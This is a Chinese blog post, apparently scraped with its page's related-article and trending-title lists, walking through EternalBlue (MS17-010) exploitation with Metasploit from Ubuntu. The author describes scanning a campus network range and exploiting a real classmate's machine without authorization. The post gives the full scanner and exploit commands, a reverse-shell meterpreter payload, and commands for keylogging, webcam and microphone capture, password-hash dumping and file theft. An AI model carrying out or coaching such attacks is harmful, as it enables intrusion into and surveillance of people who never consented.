ubuntu尝试ms17010漏洞的实验

该漏洞具有非常大的危害性,这个漏洞导致攻击者在目标系统上可以执行任意代,包括格式化电脑删除重要的内容。
当然漏洞非常的古老了,防范只需要打个补丁,再不济关闭445端口。

安装

首先打开终端输入
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
安装成功就能指令msfconsole来使用了

使用

MSF功能不止有利用ms17010,所以我们要选择对应的模块,其中利用到
auxiliary/scanner/smb/smb_ms17_010扫描工具模块
exploit/windows/smb/ms17_010_eternalblue利用工具模块

由于我实现环境是在校园网环境中,所以也就对校园网进行网段的扫描,我进入是我们的校园无线网络,连接不需要获得认证上网功能就可以实现漏洞攻击。

首先是查看自己IP

再利用扫描工具来对网段任何的B段进行扫描

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 10.120.*.*
set threads 512
exploit

扫出结果10.120.65.230IP存在漏洞风险,使用工具进行攻击

use exploit/windows/smb/ms17_010_eternalblue
set rhost 10.120.65.230
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.120.79.122
set lport 4567
exploit

其中rhost为目标主机ip,lhost为自身监听ip

显示攻击成功了,这个时候,已经可以对被攻击者为所欲为了
打中后可以输入help来查看能执行的操作

用户操作:Stdapi: User interface Commands(用户接口命令)enumdesktops    -->列出所有可访问的桌面和窗口站(窗体列表)
getdesktop      -->得到当前的Meterpreter桌面idletime        -->返回秒远程用户已经闲置数量keyscan_dump    -->转储按键缓冲(下载键盘记录)
keyscan_start   -->开始捕获击键(开始键盘记录)
keyscan_stop    -->停止捕获击键(停止键盘记录)
screenshot      -->抓取交互式桌面截图(当前操作界面截图一张)
setdesktop      -->改变meterpreters当前桌面uictl           -->控制一些用户界面组件(获取键盘、鼠标控制权)
使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)PS:键盘记录注意点,先开始,后下载,再结束,否则会出错摄像头:Stdapi: Webcam Commands(摄像头命令)record_mic       -->X秒从默认的麦克风record_mic音频记录(音频录制)webcam_chat      -->开始视频聊天(视频,对方会有弹窗)webcam_list      -->单摄像头(查看摄像头列表)
webcam_snap      -->采取快照从指定的摄像头(摄像头拍摄一张照片)webcam_stream    -->播放视频流从指定的摄像头(开启摄像头监控)其他命令操作getsystem        -->获取高权限hashdump         -->获取当前用户hash

screenshot来进行截图屏幕
发现在打游戏,偷偷的不要打扰到别人哦,上传一个txt提示他存在漏洞需要修复打补丁了呢,实验成功,点到为止哦。

tips:漏洞对于windows7以外的机器打中概率非常低,如果没有被打中,请不要再进行二次攻击,大概率会导致被攻击用户蓝屏。
借鉴链接一
借鉴链接二
借鉴链接三

2.文件系统命令
cat c:\boot.ini#查看文件内容,文件必须存在
del c:\boot.ini #删除指定的文件
upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上,如upload  setup.exe C:\\windows\\system32\
download nimeia.txt /root/Desktop/   # 下载文件到本机上如:download C:\\boot.ini /root/或者download C:\\"ProgramFiles"\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db /root/
edit c:\boot.ini  # 编辑文件
getlwd#打印本地目录
getwd#打印工作目录
lcd#更改本地目录
ls#列出在当前目录中的文件列表
lpwd#打印本地目录
pwd#输出工作目录
cd c:\\ #进入目录文件下
rm file #删除文件
mkdir dier #在受害者系统上的创建目录
rmdir#受害者系统上删除目录
dir#列出目标主机的文件和文件夹信息
mv#修改目标主机上的文件名
search -d d:\\www -f web.config #search 文件,如search  -d c:\\  -f*.doc
meterpreter > search -f autoexec.bat  #搜索文件
meterpreter > search -f sea*.bat c:\\xamp\\
enumdesktops     #用户登录数1)下载文件
使用命令“download +file path”,将下载目标机器的相对应权限的任何路径下的文件
(2)上传文件
“upload”命令为上传文件到我们的目标机器,在图中我们上传了ll.txt到目标机器的c:\pp\下。
(3)查看文件
“cat filename”在当前目录下查看文件内容,输入命令后便会返回给我们所查看文件的内容。
(4)切换、查询当前路径
“pwd”命令将查询当前在dos命令下的路径,“cd”命令可以改变当前路径,如下图中cd ..为切换到当前路径下的上一目录。

MSF利用ms17_010实验相关推荐

  1. kali:Nessus扫描漏洞并用msf利用攻击xp系统

    Nessus扫描漏洞 1.启动nessus服务 /bin/systemctl start nessusd.service 2.在浏览器打开https://192.168.50.128:8834/,登陆 ...

  2. MSF利用永恒之蓝渗透win2003

    1.信息收集 (1)使用Nmap工具进行扫描,发现开放了445端口,尝试利用ms17_010漏洞. (2)运行metasploit. 2.漏洞探测 (1)查看漏洞模块. (2)使用Auxiliary ...

  3. kali利用MSF对ms17_010漏洞入侵win7

    步骤一:实验环境的搭建 攻击机:kali(2021.1版本) 靶机:win7 旗舰版 sp1 在虚拟机里安装好上面两个环境后分别都打开(安装的步骤这里就不演示了,今天我们主要演示的是去入侵它) 打开安 ...

  4. Metasploit(msf)利用ms17_010(永恒之蓝)出现Encoding::UndefinedConversionError问题

  5. MSF手机渗透实验(未成功)(CVE-2019-2215 Binder UA)

    1. 前言 最近想利用metasploit对手机进行依次渗透实验. 通过查看最近三年的安卓漏洞,我对CVE-2019-2215这个漏洞很感兴趣. 幸运的是,metasploit里就有这个漏洞的攻击pa ...

  6. kali linux安装wine32,永恒之蓝msf下 ms17_010 (64位kali下安装wine32)

    本次用到的环境: kali(2016.2)32位系统.ip地址:192.168.1.104 目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105 ========= ...

  7. 利用永恒之蓝入侵服务器复制文件,msf利用永恒之蓝进行漏洞攻击

    1. 永恒之蓝Eternalblue 攻击 Eternalblue 通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞 恶意代码会扫描开放445文件共享端口的Windows机器, ...

  8. 使用MSF 利用 ms08_067 对 XP 进行渗透

    利用 ms08_067 对 XP 进行渗透 文章目录 利用 ms08_067 对 XP 进行渗透 一.项目要求 二.项目实施 1. 实施目标 2. 实施方案 2.1 扫描该网段存活的主机 2.2 使用 ...

  9. Meterpreter利用MS17_010病毒payload渗透电脑介绍-推荐

    转载地址:http://www.freebuf.com/sectool/154752.html 关于MeterPreter的文档比较实用的不多,这个我同事真实利用了并达到了预期的效果,所以我觉得很有必 ...

  10. MSF利用最新IE最新漏洞

    通过 backtrack 漏洞发布官网 了解最新漏洞漏洞描述:漏洞存在iepeers.dll组件中,影响ie6 7 影响系统:sp0-3.ie 6 7使用命令 show exploits use ex ...

最新文章

  1. Nginx 常用配置清单
  2. 习题2.4 递增的整数序列链表的插入 (15 分)
  3. Keil MDK 中利用串口及c标准库函数printf为cortex-m3做调试输出(lpc1788)
  4. mybatis generator eclipse插件的安装
  5. 关于async与await的FAQ 转
  6. Spring Boot常见应用属性默认值
  7. 与资源库同步时,我的svn报错 Previous operation has not finished; run 'cleanup' if it was interrupted...
  8. JDK1.8之Stream
  9. GPS :NEMA数据解析
  10. 省赛模拟一 又一道简单题
  11. SQL SERVER 数据库通过连接服务器 调用ORACLE 数据库中的存储过程
  12. LeetCode 496. 下一个更大元素 I(Next Greater Element I) 35
  13. 运维必读:避免故障、拒绝背锅的 10 大原则!
  14. 收藏!本、硕、博、程序员必备神器
  15. 虚拟机安装linux输入密钥,远程连接虚拟机并做密钥认证
  16. 科技爱好者周刊:第 98 期
  17. 粤语翻译软件开发_粤语翻译器 带发音-粤语翻译器 带发音免费软件app安卓v2.3下载-SLY软件园...
  18. pad平板性能测试软件,苹果iPad 2020款评测,最便宜的iPad,性能碾压安卓?
  19. VMware虚拟机中安装win10操作系统
  20. java数学运算(Math类)

热门文章

  1. 公司为什么需要自己的SAP内部顾问
  2. Netty系列三、Netty实战篇
  3. 哪有没时间这回事-读后感
  4. 基于matlab的gmsk,基于matlab的GMSK综合实训
  5. js对象定义的几种方法
  6. 3dMax建筑demo制作
  7. 图片右侧加文字html完整代码,怎么用css在图片右下方添加文字
  8. Docker容器监控cAdvisor
  9. go int转byte
  10. 大学计算机信息技术教程电子书资源,教与学中用好教材《大学计算机信息技术教程》.pdf...